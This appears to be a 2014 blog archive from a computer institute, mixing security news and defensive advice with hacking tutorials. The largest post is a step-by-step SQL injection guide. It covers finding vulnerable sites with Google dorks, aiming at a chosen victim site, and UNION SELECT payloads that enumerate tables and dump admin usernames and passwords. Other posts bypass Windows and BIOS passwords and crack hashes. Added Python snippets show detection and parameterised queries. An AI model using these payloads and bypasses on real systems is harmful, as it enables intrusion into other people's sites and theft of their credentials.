Wednesday, October 8, 2014

Future vision computer Institute offers Professional web Designing & development course in SURAT

Future Vision Computer Institute offers a professional web designing & development course in Surat. For the best training in WordPress, SEO, graphic designing, programming and accounting, join only Future Vision Institute. Call 9825771678

http://futurevisioncomputers.com

Friday, September 26, 2014

jQuery.com reportedly hacked to serve malware


- See more at: http://www.ehackingnews.com/2014/09/jquerycom-reportedly-hacked-to-serve.html#sthash.7XRJBetY.dpuf

jQuery.com, the official website of the popular JavaScript library jQuery (used by nearly 70% of the top 10,000 websites), had reportedly been compromised and had served credential-stealing malware.
RiskIQ announced that they had detected a malicious script in jquery.com that redirects visitors to a website hosting the RIG Exploit kit.

The redirector domain (jquery-cdn[dot]com) used in this attack was registered on September 18, the same day on which the attack was detected by RiskIQ. RiskIQ believes that this domain was intended specifically to blend into the website.

The good news is that RiskIQ found no indication that the jQuery library itself has been affected. Otherwise, many additional websites using the jQuery CDN to load the jQuery library would also have been affected.

The people at jQuery.com say they found no logs or evidence that their server was compromised.

"So far the investigation has been unable to reproduce or confirm that our servers were compromised. We have not been notified by any other security firm or users of jquery.com confirming a compromise," the jQuery.com blog post reads.
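
The redirector domain was chosen to look like a legitimate jQuery host, which is what a script-source audit is meant to catch. The Python below is an added example, not code from RiskIQ, jQuery or the original post: it lists the hosts a page loads scripts from and flags any host that carries the brand name without being on the allowlist. The allowlist, the sample page and its paths are constructed assumptions; only the defanged redirector domain comes from the article.

```python
"""Added example: audit external script hosts for look-alike domains."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: the hosts this site intentionally loads scripts from.
ALLOWED_HOSTS = {"jquery.com", "code.jquery.com"}
# Assumption: brand strings an unapproved host has no business containing.
BRAND_TOKENS = ("jquery",)

# Redirector domain as quoted (defanged) in the article, refanged for matching.
REDIRECTOR = "jquery-cdn[dot]com".replace("[dot]", ".")

# Constructed sample page: the paths are invented for illustration.
SAMPLE_PAGE = f"""
<html><head>
<script src="/js/main.js"></script>
<script src="//code.jquery.com/jquery.min.js"></script>
<script src="http://{REDIRECTOR}/view.js"></script>
<script src="https://stats.example.net/t.js"></script>
<script>var inline = 1;</script>
</head></html>
"""


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def classify_host(host):
    """Return 'allowed', 'lookalike' or 'unknown' for a script host."""
    host = host.lower().rstrip(".")
    if host in ALLOWED_HOSTS or any(host.endswith("." + a) for a in ALLOWED_HOSTS):
        return "allowed"
    # A brand name inside a host we never approved is the blend-in pattern.
    if any(token in host for token in BRAND_TOKENS):
        return "lookalike"
    return "unknown"


def audit_scripts(html, page_url):
    """Resolve each script URL against page_url and classify its host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        # urljoin handles relative and protocol-relative (//host/path) URLs.
        host = urlparse(urljoin(page_url, src)).hostname or ""
        findings.append((host, classify_host(host)))
    return findings


if __name__ == "__main__":
    for host, verdict in audit_scripts(SAMPLE_PAGE, "http://jquery.com/"):
        print(f"{verdict:10} {host}")
```

Inline scripts have no `src` and are not covered by this check; they need a content review or a Content-Security-Policy instead.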

How to Recover Windows 7 Password~Windows Password Killer Tool



I have explained how to recover a lost password using Backtrack Password Cracking. Here I am going to introduce a new tool named Windows Password Killer. It lets you remove a Windows 7 password and reset the administrator, standard user and guest passwords easily, without any data loss or file damage.

There are 3 different editions: Lite, Pro and Ultimate. Here we take the Pro edition as an example of the password removal process with a USB drive (CD/DVD is also supported).

Requirements:
1. Any accessible computer.
2. USB drive or CD/DVD.

Step 1: Install Password Killer
Download Windows Password Killer from Here.
Install Windows Password Killer on your friend's or any other accessible computer.

Step 2: Burn a bootable CD/DVD or USB drive
  1. Insert the USB drive or CD/DVD.
  2. Run Windows Password Killer.
  3. Select the USB drive or CD/DVD.
  4. Click the Create button.
  5. It will ask you to verify whether you selected the correct disk. Click the "Yes" button.

Step 3: Boot from USB Drive or CD/DVD
Now let us come to our locked computer.
  • Insert your USB drive before turning on the system (if you are using a CD/DVD, you have to turn the system on and then insert it).
  • Now turn on the system and press F10 or F12 (it may vary for your system) to choose the boot device.
  • Select the USB drive or CD/DVD.
It will boot into Windows Password Killer.

Step 4: Resetting the Password
After the program starts, select the Windows 7 system on the start page and click 'Next'.




Select your target user accounts, and then click 'Next' to proceed with the Windows 7 password recovery/unlock process.


The Windows 7 Administrator password or other user account password is now reset successfully. Take out the password reset CD/DVD and click 'Reboot' to restart your computer.

Enjoy.!!




How to crack or Reset BIOS Password? ~Cracking Tutorials



The BIOS software is built into the PC, and is the first code run by a PC when powered on ('boot firmware'). The primary function of the BIOS is to set up the hardware and load and start a boot loader. When the PC starts up, the first job for the BIOS is to initialize and identify system devices such as the video display card, keyboard and mouse, hard disk drive, optical disc drive and other hardware. The BIOS then locates software held on a peripheral device (designated as a 'boot device'), such as a hard disk or a CD/DVD, and loads and executes that software, giving it control of the PC. This process is known as booting, or booting up, which is short for bootstrapping.
A BIOS password is usually used to protect the BIOS settings on the computer. If you want to reset the BIOS password, you do not need to bother with the CMOS battery; with a little trick in DOS you can reset it. The BIOS password can be reset in 2 ways:

1. Clear CMOS
I consider this the oldest and easiest way to break the BIOS password. The steps are easy: first open the cover of the computer case. Then find the BIOS battery, which looks like a watch battery, only a little bigger. Once you have found it, look at the area around the battery: there is usually a jumper with 3 pins, 2 pins connected and 1 pin not connected.

Suppose the three pins are labelled 1 - 2 - 3. The connector usually sits on pins 2-3 initially. To reset the BIOS, move the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Restart the computer, and the BIOS password will be gone.

If the above looks complicated, an easy way to clear the CMOS is to unplug the BIOS battery and then put it back. The consequence, however, is that the warranty label on the BIOS battery has to be removed.

2. Through DOS 

First exit Windows by restarting your computer, and start the computer in MS-DOS mode using the "Command Prompt Only" option.

At the C: prompt, type: DEBUG
Press Enter. You will see the (-) sign at the DEBUG prompt. Then type:
o 70 2e
At the DEBUG prompt this will be displayed as -o 70 2e.
Press Enter and type:
-O 71 ff
Press Enter, and finally type:
Q
Press Enter; you will then leave the DEBUG prompt and return to the C:> prompt.
Now restart your computer and see the results.


How to Use Ravan for Password Cracking?



In my previous article, I explained the Ravan tool. Now let us see how to use Ravan for cracking passwords.


Requirements:
Lots of friends:
Ravan is a distributed password cracking method, so you will need lots of friends who have a PC with an Internet connection. The cracking speed increases with the number of PCs contributing to the cracking.

How to use Ravan?

Step 1:
  • Go to http://www.andlabs.org/tools/ravan.html
  • Enter the value of the hash that must be cracked
  • Enter the value of the salt, if it is not a salted hash then leave it blank
  • Enter the charset. Only these characters will be used in the brute force attack
  • Select the hashing algorithm (MD5, SHA1, SHA256, SHA512)
  • Select the position of the salt. (clear-text+salt or salt+clear-text)
  • Hit ‘Submit Hash’
Step 2:
If the hash is successfully submitted, it will return a URL. Now you just need to send this URL to all your friends and ask them to click the start button.

    The main page manages the cracking so it must not be closed or the cracking would fail.

That is it. Once your friends click start they would be doing pieces of the work and submitting results back.


The main page would constantly monitor the progress of the cracking process and manage it across all the workers. You would be able to see the stats throughout the process, once the hash is cracked the clear-text value is displayed.



Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend




Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit...less than ethically.

One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.

What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.

To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is used during a fake Wi-Fi attack include:

  • AirSSL
  • AirJack
  • Airsnarf
  • Dsniff
  • Cain
  • void11

No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.

If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (one which is quickened by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.’ You wouldn’t think twice. That’s what the hackers are counting on - you not thinking.

How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking - you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.

When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.

How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:
  • The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember - if a deal seems too good to be true, like free wifi, it probably is.
  • Use different login details and passwords for public wifi.
  • Disconnect auto-connect when you’re in unfamiliar territory.
  • Be cautious when connections suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to the fake wifi.
  • Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
  • If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.
That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.

A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection (the BREACH method), so you may want to explore using this with a secondary defensive measure.

The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack...I’ll take a funny look or two!
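
The "verify before you connect" advice can be applied to a Wi-Fi scan: compare what is being broadcast with what the venue confirmed. The Python below is an added example, not part of the original article; it flags near-identical network names, security settings that differ from the confirmed ones, and unfamiliar access points using a trusted name. The trusted profile, the record fields and the scan data are constructed assumptions, and a matching BSSID is not proof of legitimacy because it can be cloned.

```python
"""Added example: flag possible evil-twin access points in a Wi-Fi scan."""
import re
from collections import defaultdict

# Constructed profile: what venue staff confirmed for their network.
TRUSTED = {
    "Starbucks Free WiFi": {"security": "WPA2", "bssids": {"aa:bb:cc:00:00:01"}},
}

# Constructed scan results; these are not real networks.
SCAN = [
    {"ssid": "Starbucks Free WiFi", "bssid": "aa:bb:cc:00:00:01", "security": "WPA2"},
    {"ssid": "Starbucks Free WiFi", "bssid": "02:11:22:33:44:02", "security": "open"},
    {"ssid": "Starbucks Free Wi-Fi", "bssid": "02:11:22:33:44:03", "security": "open"},
    {"ssid": "JFK Free Wi-Fi", "bssid": "02:11:22:33:44:04", "security": "open"},
    {"ssid": "Starbucks Free WiFi", "bssid": "02:11:22:33:44:05", "security": "WPA2"},
]


def normalize_ssid(ssid):
    """Fold case and drop punctuation so 'Free Wi-Fi' and 'Free WiFi' collide."""
    return re.sub(r"[^a-z0-9]", "", ssid.lower())


def find_suspect_networks(scan, trusted):
    """Return (identifier, reason) pairs for access points worth a second look."""
    trusted_by_norm = {normalize_ssid(name): name for name in trusted}
    security_seen = defaultdict(set)
    findings = []
    for ap in scan:
        security_seen[ap["ssid"]].add(ap["security"])
        real_name = trusted_by_norm.get(normalize_ssid(ap["ssid"]))
        if real_name is None:
            continue  # not imitating a network we hold a profile for
        profile = trusted[real_name]
        if ap["ssid"] != real_name:
            # Same name after normalisation, different spelling on the air.
            findings.append((ap["bssid"], "lookalike-name"))
        elif ap["security"] != profile["security"]:
            findings.append((ap["bssid"], "security-mismatch"))
        elif ap["bssid"] not in profile["bssids"]:
            findings.append((ap["bssid"], "unknown-bssid"))
    # One name advertised both open and encrypted is a common twin symptom.
    for ssid, modes in security_seen.items():
        if len(modes) > 1:
            findings.append((ssid, "mixed-security"))
    return findings


if __name__ == "__main__":
    for identifier, reason in find_suspect_networks(SCAN, TRUSTED):
        print(f"{reason:18} {identifier}")
```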


6 Web Security Risks of Not Monitoring Internet Activity




Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for some it is even a vital component of their job,) it enables them to find solutions to problems, research the competition, find new customers, and more. But Internet access comes with a host of threats and if you are not on top of your web security game, allowing your users to have Internet access may cause just as many problems as it can solve. If you are going to provide your users Internet access, consider these top six web security risks of not monitoring Internet activity, and deploy a web security solution to make sure you don’t regret the generosity to your users.

1. Malware
Whether your users download infected files or they just visit compromised websites, malware infections are the single biggest risk to your users from Internet access. Web security applications can scan all files for malware and block access to known infected sites. They can also filter out malicious scripts embedded in web pages, providing strong protection against malware for your users.

2. Phishing
Phishing attacks not only put your users at risk, they can have significant and long lasting impact to your customers, your financials, and your reputation. As much as we raise awareness of phishing attacks, you can read about a new business falling victim almost weekly. Web security software can completely block access to known phishing sites, so even if your users do fall for a phishing email, they cannot submit sensitive information to the attacker’s website.

3. Copyright infringement
Even the best intentions can lead to costly impact to your business, and when users download audio and video files without obtaining the rights to them, the copyright holders can go after your business for compensation. Web security software can block the download of media files, or can filter access based on category to help prevent users from downloading content that might cost you in the long term.

4. Licensing violations
Audio and video are not the only ways a user’s actions can lead to fines and penalties. When users download and install software without obtaining a license for it, the company can be held liable as well. Sites that host cracked software, keygens, and other warez can be blocked completely using web security software, so you can exercise due diligence and avoid a run-in with the Business Software Alliance or other licensing issue.

5. Human Resources incidents
What’s appropriate to access at work and what users may be accustomed to accessing at home are often at opposite ends of the content spectrum, and it’s easy for a user to be offended, or even feel harassed, if exposed to content another user is accessing. This leads to workplace problems including morale issues, teamwork challenges, and can quickly escalate to an incident that involves HR and could lead to someone losing their job. You can avoid all of that by using web security software to block access to content inappropriate for the workplace, and to enforce safe search results in the major search engines.

6. Bandwidth consumption
Media sites such as YouTube, Netflix, Hulu, Pandora, Internet radio and television streaming sites, and others are great for when you are at home, but if only a handful of your users decide to start listening to their favorite music feed, or surreptitiously watching a movie while they should be working, you can quickly find your network without enough bandwidth to support the business critical applications like email. Web security software can block access to the non-business critical sites, and throttle bandwidth consumption for the sites you do want to allow, to ensure there is enough available for what your network really needs.

7. Wasting time
How often has a “quick” web search or social media check-in caused you to lose track of time? Now multiply that by the number of users on your network, who will do exactly the same thing, and you can quickly see how you can lose hours of productivity each day. Web security software can block access to social media sites, but the best products can instead simply limit the amount of total time or the time frames when users can use the web for recreational purposes. A few minutes here and there is a perfectly good way to ensure morale doesn’t suffer, and if a user wants to spend their lunch break updating their wall…what’s the harm in that, as long as they get back to work at the end of their lunch?

So don’t think web access without addressing web security. Web security applications can monitor access, filter out malware, block access to phishing sites or repositories, prevent the download of files that might contain copyrighted material, restrict the amount of bandwidth burned on streaming media, and even keep users from wasting time on social media sites. Web security applications are a critical component of your Internet security, and help to ensure that Internet access is a benefit, and not a risk to your company.



What are Blackhat SEO poisoning attacks?

Blackhat SEO poisoning attacks




Recently, I reported that Google Image search and Bing Image search lead to malware sites, especially a Blackhole exploit kit page. The reason behind this attack is SEO poisoning.

What is SEO?
Search engine optimization (SEO) is a collection of techniques to improve the visibility of a website in a search engine's search results. Some of the techniques used by webmasters in

What is BlackHat SEO?

Black Hat SEO, also known as SEO poisoning, is an illegal technique used by cyber criminals to make their links appear higher than legitimate results. When a user searches for related keywords, the infected links appear at the top of the search results.

Hackers use one of the following techniques:

* Creating SEO-friendly fake pages related to popular search topics on compromised sites
* Cloaking malicious content from spiders and security researchers
* Iframe injection

Poisoning Image search Results:
As most search engines filter and find text-based SEO poisoning attacks, cyber criminals are now poisoning image search results instead.

They hack legitimate sites and inject malicious code. Whenever a person clicks the image of a compromised site in the search results, it redirects them to malware sites. Sophos reports that Bing image-search results are being poisoned more than those of other search engines.





How to enable Two-Factor authentication in Linkedin?



I'm very glad to hear that LinkedIn is the latest company to boost security with two-factor authentication. A few days back, Twitter enabled two-step verification to thwart hackers.

Are you searching for a guide to configuring 2-step authentication? You are at the right place. Here is the guide that will help you configure LinkedIn two-step verification.

Before getting into the actual steps, let me explain what 2-step auth is.

Two-Step Verification:
A security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account.

Why you should enable this feature?
I believe this is the best security feature. Let us assume someone has stolen your login credentials via a keylogger, phishing or any other method. If the hacker tries to log into the website with your credentials, he will be asked to provide the secret number sent to your mobile. Fortunately, you have your mobile with you ;) . So the hacker can't log in to your account. You will also come to know that someone is trying to access your account.
 
How to configure the Linkedin Two-factor authentication?

Step 1:
Login to your account and go to the settings page:

https://www.linkedin.com/settings/ 

Step 2:
Select the "Account" tab and click the "Manage security settings" option.


Step 3: 
Here you can see the "Two-step verification for sign in" option, which shows that the feature is currently "off". To turn on the feature, simply click the "Turn on" link.



In the next step, you will be asked to enter your phone number.



Step 4:



Once you enter the phone number, you will receive a security code. After you enter the security code sent to your mobile number, the feature will be turned on. Hurrah, now you are protected :)


Next time, when you try to log in, you will be asked to provide the secret code :)




Penetration Testing Tutorials | Learn Ethical Hacking

Hacking a website using SQL Injection - step by step guide


What is SQL Injection?
SQL injection is one of the popular web application hacking methods. Using an SQL injection attack, an unauthorized person can access the database of the website and extract data from it.

What a hacker can do with SQL Injection attack?

* Bypassing logins
* Accessing secret data
* Modifying contents of website
* Shutting down the MySQL server

So, here we go.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keywords are often referred to as 'Google dorks'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.futurevisioncomputers.com/download/13161874/A...t.zip.html

Copy one of the above keywords and paste it into Google. Here, we will get a lot of search results with
We have to visit the websites one by one to check for the vulnerability.




Note: if you would like to hack a particular website, then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.futurevisioncomputers.com inurl:index.php?id=

Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and hit Enter.

For eg:
http://www.futurevisioncomputers.com/index.php?id=2'
If the page stays the same or shows a page-not-found error, then it is not vulnerable.

If you get an error message like this, then it means that the site is vulnerable:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that, replace the single quote (') with an "order by n" statement.

Change n through 1, 2, 3, 4, 5, 6, ... until you get an error like "unknown column".

For eg:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1
http://www.futurevisioncomputers.com/index.php?id=2 order by 2
http://www.futurevisioncomputers.com/index.php?id=2 order by 3
http://www.futurevisioncomputers.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number, then the number of columns is "x-1".

I mean:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1 (no error)
http://www.futurevisioncomputers.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)

So now x=8, and the number of columns is x-1, i.e. 7.

In case the above method fails to work for you, try adding "--" at the end of the statement.
For eg:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated by commas (,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.futurevisioncomputers.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.
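
Every probe in steps 2 to 4 works only because the id parameter is pasted into the SQL text and the engine's error is shown to the visitor. The Python below is an added example, not code from the original post: it runs the article's three probe strings against a handler that concatenates the id and against one that validates it and binds it as a parameter. SQLite stands in for the MySQL server the article targets, so error texts differ; the table, its columns and both handler names are hypothetical.

```python
"""Added example: the article's probes against a concatenated vs. a bound query."""
import sqlite3

# Probe strings taken from steps 2 to 4 of the article.
PAGE_PROBES = ["2'", "2 order by 8", "-2 union select 1,2,3,4,5,6,7--"]


def make_db():
    """Constructed 7-column table, matching the column count in the article."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, c2, title, c4, c5, c6, body)"
    )
    conn.execute("INSERT INTO articles VALUES (2, 'x', 'Hello', 'x', 'x', 'x', 'Text')")
    return conn


def vulnerable_handler(conn, raw_id):
    """Builds SQL by string concatenation and echoes database errors."""
    sql = "SELECT * FROM articles WHERE id=" + raw_id
    try:
        return 200, conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)  # leaks the engine's error text to the client


def hardened_handler(conn, raw_id):
    """Validates the id, binds it as a parameter, never echoes engine errors."""
    # Accept only a short run of ASCII digits; everything else is rejected
    # before any SQL is executed.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        return 400, "bad request"
    try:
        rows = conn.execute(
            "SELECT * FROM articles WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, "internal error"  # generic text; details belong in server logs
    return (200, rows) if rows else (404, "not found")


def compare(conn):
    """Map each probe to (vulnerable status, hardened status)."""
    return {
        probe: (vulnerable_handler(conn, probe)[0], hardened_handler(conn, probe)[0])
        for probe in PAGE_PROBES
    }


if __name__ == "__main__":
    db = make_db()
    for probe, (weak, strong) in compare(db).items():
        print(f"{probe!r:40} vulnerable={weak} hardened={strong}")
```

With the bound query the quote no longer produces a syntax error and the "order by" and "union select" text never reaches the SQL parser, so the column-count and column-position steps have nothing to observe.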

Step 5: Finding version, database, user
Replace the 3 from the query with "version()"

For eg:
http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now it will display the version as 5.0.1 or 4.3 or something like this.

Replace version() with database() and user() to find the database and user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
The following works if the database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind SQL injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

For eg:

http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin" table.

Step 7: Finding the Column Name

Now replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

We have to convert the table name to a MySQL CHAR() string.

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you have installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the HackBar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter the string that you want to convert to MySQL CHAR(). We want to convert the table name to MySQL CHAR(). In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commas) in the Hack toolbar.



Copy and paste the code at the end of the URL in place of "mysqlchar".

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of columns.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".

For eg:
http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' error, then try another column name from the list.

If we are lucky, then it will display the data stored in the database, depending on your column name. For instance, the username and password columns will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you are lucky, you will find the admin page using the above URLs, or you can use some kind of admin finder tool.
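
The requests described in steps 2 to 7 leave a recognisable trail in a web server's access log: a stray quote, a run of increasing "order by" numbers, then "union select" and information_schema. The Python below is an added example, not part of the original post: it decodes each logged query string, matches those patterns and groups the result per client address. The log lines are constructed (documentation IP ranges, invented timestamps) and the signature names are hypothetical labels.

```python
"""Added example: spot the article's SQL injection probe sequence in access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in combined-log style.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Sep/2014:10:00:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [26/Sep/2014:10:00:05 +0000] "GET /search?q=how+to+order+by+date HTTP/1.1" 200 2048',
    '198.51.100.7 - - [26/Sep/2014:10:01:00 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310',
    '203.0.113.5 - - [26/Sep/2014:10:02:00 +0000] "GET /index.php?id=2%20order%20by%201 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [26/Sep/2014:10:02:03 +0000] "GET /index.php?id=2%20order%20by%202 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [26/Sep/2014:10:02:06 +0000] "GET /index.php?id=2%20order%20by%203-- HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Sep/2014:10:03:00 +0000] "GET /index.php?id=-2%20union%20select%201,2,version(),4,5,6,7-- HTTP/1.1" 200 900',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
ORDER_BY_N = re.compile(r"\border\s+by\s+(\d+)", re.I)
SIGNATURES = [
    ("quote-probe", re.compile(r"=\s*-?\d+'")),
    ("order-by-probe", ORDER_BY_N),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema\.(?:tables|columns)", re.I)),
    ("fingerprint", re.compile(r"@@version|\b(?:version|database|user)\s*\(\s*\)", re.I)),
]


def analyse(lines):
    """Collect matched signature names and ORDER BY indexes per client IP."""
    per_ip = defaultdict(lambda: {"hits": set(), "order_by": set()})
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not an access-log line this parser understands
        # Decode %27, %20 and '+' so the patterns see what the database would.
        query = unquote_plus(urlsplit(match.group("target")).query)
        hits = {name for name, rx in SIGNATURES if rx.search(query)}
        if hits:
            stats = per_ip[match.group("ip")]
            stats["hits"] |= hits
            stats["order_by"].update(int(n) for n in ORDER_BY_N.findall(query))
    return per_ip


def classify(stats):
    """Rank a client by how far along the article's sequence it got."""
    if stats["hits"] & {"union-select", "schema-enum"}:
        return "injection-attempt"
    if len(stats["order_by"]) >= 3:
        return "column-enumeration"  # several distinct ORDER BY indexes
    return "probe"


def report(lines):
    return {ip: classify(stats) for ip, stats in analyse(lines).items()}


if __name__ == "__main__":
    for ip, verdict in report(SAMPLE_LOG).items():
        print(f"{ip:15} {verdict}")
```

The ordinary search for "order by date" is not flagged because the pattern requires a numeric column index, which keeps false positives down on sites with a search box.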